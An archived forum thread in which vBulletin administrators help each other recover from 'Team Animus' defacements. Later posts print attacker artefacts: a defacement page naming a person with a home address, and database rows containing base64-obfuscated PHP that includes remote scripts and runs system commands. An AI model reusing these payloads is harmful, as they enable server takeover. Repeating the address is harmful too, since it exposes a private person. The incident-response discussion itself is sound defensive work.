vb.org Archive - Hacked by Team Animus?

vb.org Archive (https://vborg.vbsupport.ru/index.php)

- vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)

- - Hacked by Team Animus? (https://vborg.vbsupport.ru/showthread.php?t=263202)

Hacked by Team Animus?

If your forums has been hacked by "Team Animus", please read this to get helped to remove hacking traces and make your forums secure.

NOTE: Please be careful when removing any data. Make sure you have backups of your important files and databases!

What they did:

Code:

1. Added vba.php to INCLUDES folder

2. Replaced several index.php files, added some index.html files

3. Added new user with ID "13371338", admin status

4. Changed user titles to "Hacked by Team Animus"

5. Disabled current admins

6. Disabled forums

Here is what I have done:

Code:

01. MyAdmin > Deleted latest user (hacker - admin group)

02. MyAdmin > Changed autoincrement value in USER table to {LatestUserID} + 1

03. MyAdmin > Executed two queries to fix user titles:

        UPDATE user SET usertitle = replace(usertitle, "Hacked by Team Animus", "");

        UPDATE user SET customtitle = '0' where customtitle = '1';

04. FTP > To be sure that all files are OK, I've deleted everything from my forum folder, except:

        images, banners, .htaccess, favicon, config.php (re-checked content of this one, just in case)

05. FTP > Uploaded original forum files + custom .php's which belongs to add-ons I'm using

06. FTP > Uploaded tools.php, restored my admin status, enabled forums

07. FTP > Deleted tools.php and /install/install.php

[S]08. ACP > Removed "Skimlinks Plugin" (who installed this? hacker?)[/S] - Edit: added by vB in 4.1.3

09. ACP > Updated "VSa - Advanced Forum Rules" add-on (download latest version: vB3.x, vB4.x)

10. ACP > Re-imported all add-ons I'm using, with "overwrite" checked, to ensure there are no modified codes

11. ACP > Maintenance > update user titles, fix broken user profiles, repair and optimize tables

If you have any questions, feel free to ask.

And again: Make sure you have backups of your important files and databases before you delete anything!

ok, so I went to

user>operations>changed the user number to be correct>hit "go"

And it reverts right back to the 13371341

Any ideas?

It should be {LatestUserID} + 1.

Check user ID of your latest regular user (sort rows by user id desc). Let's say its 456.
Go to USER table > Operations > change AUTO_INCREMENT to 457.

nevermind, I missed 3 new registrants.

I'm still wondering how they added files.

There must be something more than Forum Rules add-on.

If they breached the db because of the exploit it would be nothing to get to the server from there, I would think.

Oh, and this is legit:

08. ACP > Removed "Skimlinks Plugin" (who installed this? hacker?)

It was added in 4.1.3, I think.

Great share, I wasn't attacked thank god.

Not every site had the same things done to it honestly. Having cleaned a number of them, lots of different things were done to different sites, not all steps were done to all of the sites. It would be in your best intrests to RESTORE A BACKUP, or contact vBulletin support for help.

my forum has also been hacked by 2 different groups, one just did a quick and simple redirect, the other has for the moment taken control and somehow they are redirecting everything to their server, my server admin isnt around at the moment so im totally at a loss how to kill them off

ive been hacked by http://pro2leet.net/forum.php and http://belegit.net/forum/ and both these sites use vbulletin software

We were lucky in that (Australian time) the hack attack occurred in the early morning but after our daily 3am backup.

I changed passwords, I deleted all the newly updated files, I replaced them from original source, restored from the 3am backup - all good.
We only lost a handful of threads and posts, but it was the safest option IMHO.

Lessons?
1. Have a daily backup!
2. Have all the source code safe somewhere else.
3. Take more time to eyeball add-on code

Note: Valter's code has been around for years. NO ONE noticed the problem until now.

It's very easy to visually check all form fields and SQL in an addon; checking that vB cleaning and escape_string have been applied.
We (Admins) all need to be vigilant, no point blaming anyone, TeamAnimus have done us a favour by making us take security seriously.
Not that I would object to tasking Seal Team 6 onto TeamAnimus :D

Kym

--------------- Added [DATE]1304639047[/DATE] at [TIME]1304639047[/TIME] ---------------

Quote:

Originally Posted by wraggster (Post 2192422)

Once the vba.php trojan is there, anyone can use it to hack your system. :eek:
Sounds like a piggy back attack to me. :(

I've got hacked. I hope I got it back, but for some reason my "user titles" are gone. Like "junior fellow" "senior fellow" etc. Any suggestion? I tried to repair tables etc, but not to avail.

Tx

EB

Quote:

Originally Posted by Valter (Post 2192298)

I'm still wondering how they added files.

There must be something more than Forum Rules add-on.

After they got into the Admin Panel they could have easily add a plugin which would allow them to upload something on the site, i.e php shell for modifying of the current files, or uploading of the newer files.

Quote:

Originally Posted by EuroBeat2 (Post 2192547)

I've got hacked. I hope I got it back, but for some reason my "user titles" are gone. Like "junior fellow" "senior fellow" etc. Any suggestion? I tried to repair tables etc, but not to avail.

Tx

EB

1. Go in (phpMyAdmin) or SSH connecting
2. Open table user
3. Run SQL query

Code:

UPDATE user SET customtitle = '0' where customtitle = '1'

4. Then: Update the counters - Update User Titles and Ranks

Thanks for all your help Valter.

Was everyone who got hacked using the Advanced Forum Rules?\

Quote:

Originally Posted by 0ptima (Post 2193493)

Was everyone who got hacked using the Advanced Forum Rules?\

i was only using that mod and the vb forums - nothing else. so to me, it's clear what it was. lesson learned. i will never us another mod again. yes, really.

Since updating this poor mod Cyb - Advanced Forums Rules I've followed the above and all looked great until today.

Came hole from work and I could not find my forum so I FTPed in and all my files, the lot have been removed and site is now no more. Team Animus was the original hackers but I think they installed a backdoor and then regained access and deleted the lot.

Not happy because Im not running and backups locally and hoping my host has backups.

May reupload Vbulletin fresh and hope the database is ok.

Regards

Quote:

Originally Posted by The Realist (Post 2194109)

Since updating this poor mod Cyb - Advanced Forums Rules I've followed the above and all looked great until today.

That mod is not "poor" in fact as other staff members have posted recently about this subject, the code has been there for years and just now discovered as a exploit the same thing can be said about countless other softwares. Do you see vBulletin being sued for someone not patching their site when a exploit is found? No in fact everyone knows or should know it's falls on you and solely you if not patched. Further more that's just simply not fair to say despite what your going through, YOU installed it correct? Don't get me wrong I'm not saying you can't feel "wronged" I'm simply saying if you point that anger towards someone it should not be Valter's mod you've been using and enjoying for a while now, it should be those who defaced your site respectively.

Point taken.

Quote:

Originally Posted by TheLastSuperman (Post 2194130)

When I try and run the Query and it does not allow me to do so, Where exactly do you have to go and do the Query?

Quote:

Originally Posted by GRJoker (Post 2194559)

When I try and run the Query and it does not allow me to do so, Where exactly do you have to go and do the Query?

I assume you tried to run it from your Acp, right? You should enter your uid at the can run queries part at the config.php file to be able to run queries from your Acp.

Anyway, you can also run the query at the SQL box at your phpmyadmin in the CP of your host.

I have now been hacked twice. I followed the stated guidlines and updated my CYB - Advanced Forum Rules as well. I have checked all files in FTP and removed any new ones. Also checked the db and deleted the new user.

I do not know what else to do here.

We were attacked again today. Similar attack, but slightly different payload.
VSa - Advanced Forum Rules is the latest version, so I think there is another hole maybe in another plugin.

Quote:

Originally Posted by snoopytas (Post 2194640)

We were attacked again today. Similar attack, but slightly different payload.
VSa - Advanced Forum Rules is the latest version, so I think there is another hole maybe in another plugin.

What other plugins do you have? Are you sure they didnt leave any backdoors for them to come back the last time they hacked you?

I have several other plugins.
I restored from a backup and re-loaded all scripts and removed vsa.php index.html etc.

The new payload concerns me, similar but different. It did include vsa.php (again)

HTML Code:

<head> 

<title>hack by liut</title> 

<script src="party.js"></script>

</head> 

<body bgcolor="black"> 

<br/><br/>

<center> 

<font color="white">make sur u turn up ur speakers so u can here me talk about the hack n express my opinions. btw i hacked slq injector db decriptin passwrds rite now :)</font> 

<img src="http://i.imgur.com/QBquY.jpg" /> 

<object width="0" height="0"> 

<param name="movie" value="http://www.youtube.com/v/3a56LO3heac&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x4e9e00"></param> 

<param name="allowFullScreen" value="true"></param> 

<param name="allowscriptaccess" value="always"></param> 

<embed src="http://www.youtube.com/v/3a56LO3heac&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x4e9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="0" height="0"> 

</embed> 

</object> 

<object width="0" height="0"> 

<param name="movie" value="http://www.youtube.com/v/Xi5ZUVP62Iw&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x4e9e00"></param> 

<param name="allowFullScreen" value="true"></param> 

<param name="allowscriptaccess" value="always"></param> 

<embed src="http://www.youtube.com/v/Xi5ZUVP62Iw&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x4e9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="0" height="0"> 

</embed> 

</object> 

<font color="white">Phillip S Roberts<br />

14 Prince's St N<br/>

Exeter, Devon EX2 9AL, UK<br/>

i dar u 2 com get me u lil pussies i been doin mma for 4 months i can tak u</font> 

</center> 

</body> 

</html>

--------------- Added [DATE]1305183220[/DATE] at [TIME]1305183220[/TIME] ---------------

I just found that I had the fist fixed version not the 2nd. Damn!

Yep I've been hacked for the second time too - like the first time I didn't have that user or the vsa.php files etc. Just turned my forum off and removed my admin rights.

I've turned off all extensions for now, while this story pans out.

You guys should check your own computers for issues. Are you using an FTP client that stores your passwords in plain text? Are you using SFTP for connecting to your server?

I think I've noticed another potential problem in Advanced Forum Rules. I've sent a PM to Valter but haven't heard back yet (is there someone else I should contact?)

Quote:

Originally Posted by kh99 (Post 2194701)

I think I've noticed another potential problem in Advanced Forum Rules. I've sent a PM to Valter but haven't heard back yet (is there someone else I should contact?)

I think in such cases you can contact the admins here.

Just got the quarantine email, again

Ugh! Again? I just got the email as well. Wonder whats wrong now? >< Poor Valter.

I keep reading "hacked by team Anus".

Quote:

Originally Posted by borbole (Post 2194751)

I think in such cases you can contact the admins here.

For future reference, don't PM. I'm told the correct thing to do would have been to click on "Report this Post" in the mod thread.

Quote:

Originally Posted by Bulldog Stang (Post 2194632)

you, me and many others.
uninstall this rotten back door to hell. it is now without a doubt that it has not been fixed, no matter the claims. it's getting to the point where you have to wonder if it's some kind of conspiracy or something. :mad: :down:
it' is not a case where they breached before and were "waiting". i was only hacked after i upgraded to v4.0.4 and not before.

UNINSTALL ANY AND ALL MODS - PERIOD!!

Removing all mods is a little extreme, don't you think?

Quote:

Originally Posted by Boofo (Post 2195384)

Removing all mods is a little extreme, don't you think?

While I do understand your frustration about everything, I kind of agree with Boofo here. Uninstalling every mod is a little extreme.

yeah, sure. i suppose you could change that to all cyb mods.
but in my case i only ever used one mod. the cyb afr one. i uninstalled it and also decided to keep my vb forum vanilla. apart from changing colors and stuff from within it, that is it for me. lesson learned. i'm too much a control freak to allow myself to be "violated" again. :P (one rape is enough)

Quote:

Originally Posted by Suiram (Post 2195382)

you, me and many others.
uninstall this rotten back door to hell. ...

UNINSTALL ANY AND ALL MODS - PERIOD!!

Might want to try to understand that ANY AND ALL code is susceptible to exploits - hence the reason there are always updates and patches offered (even for operating systems, and vBulletin core software, etc.).

If you were hacked again - you didn't completely purge the server of the exploitable code.

Ensure that all copies of vba.php have been removed:
/forum/includes/vba.php
/forum/includes/xml/vba.php

Also - check (or get your host to check) your server logs for access.

Also - do a full scan of the database; as we had base64 data encoded into the database in the rtable field within the guest table.

Entries I removed:

| guestid | hostip | useragent | lastactive | spider | script | rdata | a33ea4abd15916de0fe47c20e8efc48f | 203.147.62.92 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1278294864 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:262:"

PHP Code:


		
			
echo(base64_decode("ZU5kQQ==").php_uname().base64_decode("ZU5kQQ=="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));;die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 1eafdc25e937348e21e2bb1158b73c48 | 193.71.28.34 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1279528160 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"

PHP Code:


		
			
echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 544953a2c138f10bf32df7677065d1ed | 205.251.131.33 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1279527971 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"

PHP Code:


		
			
echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 494edcf8661b32d80c1078019f0f25a7 | 208.64.68.228 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1280926630 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"

PHP Code:


		
			
echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 13640f07244b04a849cb78f5c8fc4dbf | 61.47.40.39 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1285330209 | | externalframe | a:9:{s:3:"ref";s:37:"http:/www.t...om/cephcare/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die;

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| ad7b15b9bdcf0993071e56659d065a9e | 110.45.165.22 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1290781080 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die;

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 23cf7b6e31cd2d81162dc26542cb3f10 | 70.38.37.151 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1290961798 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"

PHP Code:


		
			
echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| b70f8e63432d70f392cc060fdc411975 | 174.121.219.80 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1294083379 | | showthread | a:8:{s:6:"postid";i:346415;s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die;

";s:1:"s";s:0:"";s:8:"threadid";i:0;s:7:"forumid"; s:3:"156";s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 51da94725eda052743162729a45c12e4 | 67.192.224.98 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30 | 1294480629 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:919:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAiQkhMVGVhbTxicj4iOwplY2hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7CiRjbWQ9ImVjaG8gQmFsaXNvdXJjZSI7CiRlc2VndWljbWQ9ZXgoJGNtZCk7CmVjaG8gJGVzZWd1aWNtZDsKZnVuY3Rpb24gZXgoJGNmZSl7CiRyZXMgPSAnJzsKaWYgKCFlbXB0eSgkY2ZlKSl7CmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsKQGV4ZWMoJGNmZSwkcmVzKTsKJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpewokcmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7Cn0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpewpAb2Jfc3RhcnQoKTsKQHN5c3RlbSgkY2ZlKTsKJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsKQG9iX2VuZF9jbGVhbigpOwp9CmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1JykpewpAb2Jfc3RhcnQoKTsKQHBhc3N0aHJ1KCRjZmUpOwokcmVzID0gQG9iX2dldF9jb250ZW50cygpOwpAb2JfZW5kX2NsZWFuKCk7Cn0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsKJHJlcyA9ICIiOwp3aGlsZSghQGZlb2YoJGYpKSB7ICRyZXMgLj0gQGZyZWFkKCRmLDEwMjQpOyB9CkBwY2xvc2UoJGYpOwp9fQpyZXR1cm4gJHJlczsKfQ=='));die;

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 4fe82d2e1e7c29e795a3d5617e803d3b | 195.42.120.131 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1295022885 | | forumdisplay | a:9:{s:1:"f";s:14:"49/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die;

";s:7:"forumid";i:49;s:1:"s";s:0:"";s:6:"postid";i :0;s:8:"threadid";i:0;s:6:"pollid";i:0;s:1:"a";s:0 :"";} |
| 2f85afe9e6bf839981d96c6482d2b90d | 199.124.61.2 | Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/ | 1295771568 | | showthread | a:9:{s:1:"p";s:18:"347103/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die();

";s:6:"postid";i:347103;s:1:"s";s:0:"";s:8:"thread id";i:0;s:7:"forumid";s:2:"28";s:6:"pollid";i:0;s: 1:"a";s:0:"";} |
| ffb65c6cc094dcbfbb05b96e368d9c53 | 208.91.57.65 | Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9 | 1295778092 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"

PHP Code:


		
			
